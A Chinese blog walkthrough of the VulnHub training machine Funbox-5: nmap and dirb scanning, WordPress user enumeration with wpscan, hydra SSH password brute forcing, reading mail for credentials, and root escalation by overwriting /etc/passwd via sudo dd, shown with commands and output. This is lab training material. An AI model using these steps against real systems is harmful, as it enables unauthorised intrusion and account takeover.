FUNBOX-5: NEXT LEVEL

最新推荐文章于 2024-05-11 22:47:57 发布
最新推荐文章于 2024-05-11 22:47:57 发布
阅读量721 收藏 1
点赞数 1
分类专栏: vulnhub靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43784056/article/details/110484002
版权

1、找到靶机ip:192.168.75.10

nmap -sn 192.168.75.0/24

2、扫描靶机端口

root@chounana:~# nmap -p- -A 192.168.75.10
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.75.10
Host is up (0.00044s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 af:ae:39:e2:da:bb:6f:1a:6b:04:ec:36:29:d9:0c:ea (RSA)
|   256 1d:d7:ef:2c:85:bf:0d:fc:e2:60:85:22:42:8d:cc:4d (ECDSA)
|_  256 a0:a4:6d:d9:ca:3e:71:a1:31:ea:a2:7e:42:63:13:74 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 08:00:27:4D:A4:E9 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11, Linux 3.16 - 4.6, Linux 3.2 - 4.9, Linux 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.44 ms 192.168.75.10

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.00 seconds

3、访问80端口是默认的apache页面,手动尝试了一下robots.txt文件,发现一个,但是试了发现没有,想到下载页面的提示,这里就没有深究

4、扫描网站目录,这里推荐直接使用dirb扫描,因为它会自动往下级目录扫描,比较快,扫到一个drupal目录,如果根据第一印象,这应该是drupal cms,所以是去访问然后查看它是哪个版本的,然后利用相关exploit脚本攻击,但是这里不能访问,会被重定向到192.168.178.33,这是访问不到的,这个也能联想到前面的提示

dirb http://192.168.75.10

但是dirb继续在这个目录下探测却发现了不一样的东西,就是有wp网站的特征目录

在之前的目录下拼上index.php发现是可以访问的,还有wp-content目录也是可以访问的,那么接下来就直接上神器wpscan扫描用户,至于wpscan的用法我前面有一篇文章讲过,这里不做赘述,这里扫描的时候需要指定wp-content的目录

wpscan --url http://192.168.75.10/drupal/index.php --wp-content-dir=http://192.168.75.10/drupal/wp-content --api-token=[你自己的] --enumerate u,p

发现有两个用户,admin和ben,由于wp-admin不能访问,所以尝试直接使用ben用户爆破ssh登录

5、爆破出用户ben的密码为pookie

hydra -l ben -P /usr/share/wordlists/rockyou.txt ssh://192.168.75.10

ssh登录上去

root@chounana:~# ssh ben@192.168.75.10
ben@192.168.75.10's password: 
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-189-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Introducing self-healing high availability clusters in MicroK8s.
   Simple, hardened, Kubernetes for production, from RaspberryPi to DC.

     https://microk8s.io/high-availability

0 packages can be updated.
0 updates are security updates.

New release '18.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


You have mail.
ben@funbox5:~$

尝试一些常规的手段收集一些信息,没有什么能提权的文件,在home目录下有另外两个用户文件夹,但是都没有权限访问

前面登录进来的时候提示有邮件,id查看一下用户组,发现ben属于mail组,但是不能直接使用mail命令进行查看,使用命令查看后台监听端口,发现110端口,就是邮件端口

ben@funbox5:~$ mail
-bash: /usr/bin/mail: Permission denied
ben@funbox5:~$ id
uid=1001(ben) gid=1001(ben) groups=1001(ben),8(mail)
ben@funbox5:~$ netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:587           0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:110             0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:143             0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
tcp        0      0 192.168.75.10:22        192.168.75.6:57120      ESTABLISHED -               
tcp        0      0 192.168.75.10:22        192.168.75.6:57118      ESTABLISHED -               
tcp        0      0 192.168.75.10:22        192.168.75.6:58214      ESTABLISHED -               
tcp6       0      0 :::110                  :::*                    LISTEN      -               
tcp6       0      0 :::143                  :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
ben@funbox5:~$

使用telnet命令连接到本地的110端口,使用ben的用户名和密码进行登录,使用list指令列举邮件,发现有三封,使用retr命令查看内容,在第三封发现有用信息,得到adam的用户名和密码

6、切换到adam用户,使用sudo -l命令发现可以使用root身份运行dd命令,可以使用这个命令来修改/etc/passwd文件,从而修改root密码来提权

先使用dd命令将/etc/passwd复制到当前文件夹,由于adam用户没有修改权限,所以将其下载到本地,生成一个以root为密码的密文,然后使用root身份进行修改,然后在发送到靶机上,然后再通过dd命令将修改过后的passwd复制到/etc/目录下,从而覆盖之前的文件,达到修改目的,最终拿到flag

adam@funbox5:~$ sudo dd if=/etc/passwd of=./passwd
3+1 records in
3+1 records out
2020 bytes (2.0 kB, 2.0 KiB) copied, 0.000882335 s, 2.3 MB/s
adam@funbox5:~$ ls -l
total 4
-rw-r--r-- 1 root root 2020 Dec  1 09:42 passwd
adam@funbox5:~$ sudo dd if=/tmp/passwd of=/etc/passwd
4+1 records in
4+1 records out
2125 bytes (2.1 kB, 2.1 KiB) copied, 0.000988471 s, 2.1 MB/s
adam@funbox5:~$ 

root@chounana:~# scp adam@192.168.75.10:/home/adam/passwd ./
adam@192.168.75.10's password: 
passwd                                   100% 2020   608.4KB/s   00:00    
root@chounana:~# mkpasswd -m sha-512 root
$6$ImAMkOwZsS5l0HWf$89q5Yu10SuCABYJAIfEGTadihE/z3qCWwKK.DWEv8yaK7vfPEGOjQEWJMAD7M.IVEsS0urAvoKWq.kpe7N1Tu/
root@chounana:~# gedit passwd 

(gedit:2121): Gtk-WARNING **: 16:48:24.742: Calling org.xfce.Session.Manager.Inhibit failed: GDBus.Error:org.freedesktop.DBus.Error.UnknownMethod: No such method “Inhibit”
root@chounana:~# cat passwd 
root:$6$TOGT8tMexiscr/d6$IQ7akQ46BDvaChD5KPIiJo0MGn312E4s6SzEemahMjw78urvkyND5pkKtpAssgmS0whoXRsBanYrwhvT4RqXH1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:108:112::/var/run/dbus:/bin/false
uuidd:x:109:113::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
postfix:x:111:117::/var/spool/postfix:/bin/false
dovecot:x:112:119:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:113:120:Dovecot login user,,,:/nonexistent:/bin/false
sshd:x:114:65534::/var/run/sshd:/usr/sbin/nologin
maria:x:1000:1000:,,,:/home/maria:/bin/bash
ben:x:1001:1001:,,,:/home/ben:/bin/bash
smmta:x:115:123:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:116:124:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
adam:x:1002:1002:,,,:/home/adam:/bin/bash
root@chounana:~# 
root@chounana:~# scp passwd adam@192.168.75.10:/tmp/passwd 
adam@192.168.75.10's password: 
Connection closed by 192.168.75.10 port 22
lost connection
root@chounana:~# scp passwd adam@192.168.75.10:/tmp/passwd 
adam@192.168.75.10's password: 
passwd                                   100% 2125     2.1MB/s   00:00    
adam@funbox5:~$ sudo dd if=/tmp/passwd of=/etc/passwd
4+1 records in
4+1 records out
2125 bytes (2.1 kB, 2.1 KiB) copied, 0.000988471 s, 2.1 MB/s
adam@funbox5:~$ su - root
Password: 
root@funbox5:~# ls
flag.txt
root@funbox5:~# cat flag.txt 
 _______           _                     ______                      _                       _ 
(_______)         | |                   |  ___ \             _      | |                     | |
 _____ _   _ ____ | | _   ___ _   _ _   | |   | | ____ _   _| |_    | |      ____ _   _ ____| |
|  ___) | | |  _ \| || \ / _ ( \ / |_)  | |   | |/ _  | \ / )  _)   | |     / _  ) | | / _  ) |
| |   | |_| | | | | |_) ) |_| ) X ( _   | |   | ( (/ / ) X (| |__   | |____( (/ / \ V ( (/ /| |
|_|    \____|_| |_|____/ \___(_/ \_|_)  |_|   |_|\____|_/ \_)\___)  |_______)____) \_/ \____)_|

Made with ❤ by @0815R2d2
Please, tweet me a screenshot on Twitter.
THX 4 playing this Funbox.
root@funbox5:~#

 

0ne_
关注
专栏目录
vulnhub--Funbox: Under Construction!
venu_s的博客
08-04 447
靶机介绍 Description: As always, it’s a very easy box for beginners. Download:https://www.vulnhub.com/entry/funbox-under-construction,715/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描 nmap -sV -p- -A 192.168.187.177 目录扫描 gobuster dir -u http://19
vulnhub靶机实战--FunBox:1
m0_64312309的博客
09-21 518
Vulnhub介绍: Vulnhub 是一个漏洞靶场平台,里面含有大量的靶场镜像,只需要下载虚拟机镜像,导入 VMWare 或者 VirtualBox 即可启动靶场,同时它还提供了 Docker 镜像,可以使用 Docker 直接启动靶场,大大简化了渗透测试人员在搭建各种漏洞靶场时的步骤
vulnhub Funbox: Next Level(funbox5)
箭雨镜屋
04-06 899
渗透思路:nmap扫描 ---- dirb扫描 ---- wpscan枚举用户名 ---- hydra爆破ssh登录密码 ---- 登录pop3端口查看邮件 ---- pkexec提权
VulnHub渗透测试实战靶场 - FUNBOX: NEXT LEVEL
LYJ20010728的博客
08-27 403
VulnHub渗透测试实战靶场 - FUNBOX: NEXT LEVEL题目描述环境下载FUNBOX: NEXT LEVEL靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 题目描述 Lets separate the script-kids from script-teenies. Hint: The first impression is not always the right one! If you need hints, call me on twitter: @0815R2d2 Have
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox5(NEXT LEVEL
Aluxian_的博客
09-09 629
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。
FUNBOX-5靶机
小小猪的博客
06-30 358
FUNBOX-5靶机 arp-scan -l 扫描靶机IP地址 nmap -sV -Pn -A x.x.x.134 扫描靶机端口 访问80端口是默认的apache页面,扫描目录发现robots.txt文件,发现一个,但是试了发现没有,想到下载页面的提示,这里就没有深究 并不是目录 再次看扫描的目录 在之前的目录下拼上index.php发现是可以访问的,还有wp-content目录也是可以访问的,那么接下来就直接上神器wpscan扫描用户,至于wpscan的用法我前面有一篇
vulnhub靶场之FunBox-5
最新发布
qq_58091216的博客
05-11 655
我们可以看到cms是wordpress,那么我们使用wpscan进行爆破,因为开启了22端口,我们可以进行ssh登录。切换用户查看权限 id发现在sudo组 查看sudo -l发现了dd,de,df都可以sudo提权 只有dd可以使用。我们发现重定向了192.168.178.33,没有什么用,我们进行扫描drupal试试。我们在根目录下可以看到mail目录,但是里面的文件我们没有权限查看。我们可以看到110端口是开放的吗,我们使用110端口进行查看。我们可以看到爆破不出来,那么我们爆破另一个。
docker-funbox:具有有趣的终端命令和ASCII艺术的Docker容器
05-04
Docker Funbox 带有有趣怪异终端命令和ASCII艺术的容器。 特色 按字母顺序: 洛尔卡特 喵喵猫 管道 RIG-随机身份生成器 sl (不要与ls混淆) 洗手间 VLC S 基本用法 $ docker run --rm -it wernight/funbox _ ...
funxbox-test:Funbox的测试任务
05-08
Funbox的测试任务 要启动它: npm安装 凉亭安装 吞咽 喝一口 gulp测试(用于测试) 通过在文本框中输入名称并按Enter,可以添加新的航点。 此后: 输入的路径点显示在已添加点列表的末尾; 标记会出现在地图...
vulnhub--Funbox: Scriptkiddie
venu_s的博客
08-16 711
靶机介绍 Difficult: As always, it’s a very easy box for beginners. Goal: Get flag Download:https://www.vulnhub.com/entry/funbox-scriptkiddie,725/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.0.128/24 端口扫描 nmap -sV -p- -A 192.168.0.131 nmap扫描结果 并不能用 anonymous
Vulnhub靶机:FunBox 5
qq_48904485的博客
01-24 1053
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:FunBox 5(10.0.2.30)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/funbox-next-level,547/
靶机渗透练习26-Funbox5-Next Level
hirak0的博客
04-18 980
靶机描述 靶机地址:https://www.vulnhub.com/entry/funbox-next-level,547/ Description Lets separate the script-kids from script-teenies. Hint: The first impression is not always the right one! If you need hints, call me on twitter: @0815R2d2 Have fun… This works bet
VNC Viewer请求超时解决方案 、灰屏解决方案(gnome或xfce4)
热门推荐
qq_41340996的博客
11-08 3万+
VNC Viewer 请求超时 问题 在通过VNC Viewer连接虚拟桌面时,出现了连接超时的现象,一般出现这种问题,首先考虑一下是不是服务器IP 或 VNC端口号 输入错误导致。 经过排查后,确认IP和端口号都是正确的,尝试各种方法后发现问题所在: 服务器可能打开了防火墙,通过服务器外部IP无法访问某些服务,导致连接超时。 解决方案 只需要在服务器中手动开启相应的端口号,VNC Viewer就能够访问了。 首先查看当前防火墙的规则: #查看当前的规则和对应的编号,需要使用root权限 sudo ipt
Ubuntu桌面环境异常
Fishfishfishfishcat
01-05 948
http://www.jmpcrash.com/?p=1142 现象:Ubuntu docker栏目消失、搜索用不了登陆界面过于简化。 error: GDBus.Error:org.gtk.GDBus.UnmappedGError.Quark._g_2dfile2_derror_2dquark.Code17: Cannot open dconf database: invalid gvdb header
小技巧:在Ubuntu 14.04中重置Unity和Compiz设置
weixin_34217773的博客
05-02 164
小技巧:在Ubuntu 14.04中重置Unity和Compiz设置 如果你一直在试验你的Ubuntu系统,你可能最终以Unity和Compiz的一片混乱收场。在此贴士中,我们将看看怎样来重置Ubuntu 14.04中的Unity和Compiz。事实上,全部要做的事,仅仅是运行几个命令而已。 重置Ubuntu 14.04中的Unity和Compiz...
docker 问题
天下对手教会少林武僧
08-30 1053
docker 守护进程绑定的是一个 unix socket,而不是 tcp 端口,默认用户是 root,其它用户可以使用 sudo 命令来访问 socket 套接字文件。为了避免每次运行 docker 命令的时候都需要输入 sudo,可以创建一个 docker 用户组,并把相应的用户添加到 docker 分组里面。当 docker 进程启动的时候,会设置套接字可以被 docker 分组的用户读写。默认情况下Docker的存放位置为:/var/lib/docker。3.修改 docker 镜像存储地址。
linux-xfce4-panel
feiyu5323的专栏
07-23 2283
导航 (返回顶部) 1. DE:xfce简述 2. DM:lightdm 3. Group:xfce4 4. Group:xfce4-goodies 4.1 xfce4-goodies 4.2 替代品: 4.3 卸载的部分: 5. panel-plugins 5.1 笔记本+外接显示器的使用示例 5.2 插件列表: 5.3 还有一些功能重复的,但都很好用的插件: 6. ...
无法编译ROS包,提示依赖项出错
wanghuohuo13的博客
05-07 1656
1.下载navigation的包,catkin_make失败,提示依赖不对:下列软件包有未满足的依赖关系: build-essential : 依赖: libc6-dev 但是它将不会被安装 但是安装了依赖又出现其他依赖不对2.于是便发现到有以下问题(1)有一些软件包无法被安装。如果您用的是 unstable 发行版,这也许是因为系统无法达到您要求的状态造成的。该版本中可能会有一些您需要的软件包尚...
SSH登录Ubuntu速度缓慢/usr/bin/xauth: timeout in locking authority file /home/book/.Xauthority
yehe111的博客
11-05 3777
现象 ssh登录Ubuntu时,速度很慢,输出信息如下: ┌────────────────────────────────────────────────────────────────────┐ │ • MobaXterm 20.3 • │ │ (SSH client, X-server and networking tools) │
FUNBOX: UNDER CONSTRUCTION!
08-16
它有两个标志,可以在该链接下载:https://www.vulnhub.com/entry/funbox-under-construction,715/。通过主机发现工具netdiscover可以进行信息探测,命令如下:netdiscover -i eth0 -r 192.168.187.0/24。此外,在...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值